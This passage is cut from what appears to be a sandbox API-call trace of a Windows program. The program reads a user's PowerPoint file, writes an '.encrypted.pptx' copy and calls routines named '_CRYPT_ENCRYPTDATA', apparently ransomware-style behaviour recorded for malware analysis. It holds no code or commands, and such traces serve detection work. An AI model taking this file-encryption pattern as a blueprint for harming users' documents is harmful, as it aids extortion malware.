wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.454] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.454] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.454] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\szlym.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.455] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.455] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.455] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.455] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.457] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd")) returned 0x10 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.457] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\szlym.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.458] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.459] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.459] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.459] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xd05e, lpOverlapped=0x0) returned 1 [0036.461] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd05e) returned 0x955018 [0036.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd05e) returned 0x962080 [0036.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.464] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd05e) returned 0x955018 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.466] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd05e) returned 0x955018 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd05e) returned 0x96f0e8 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.468] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.469] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: 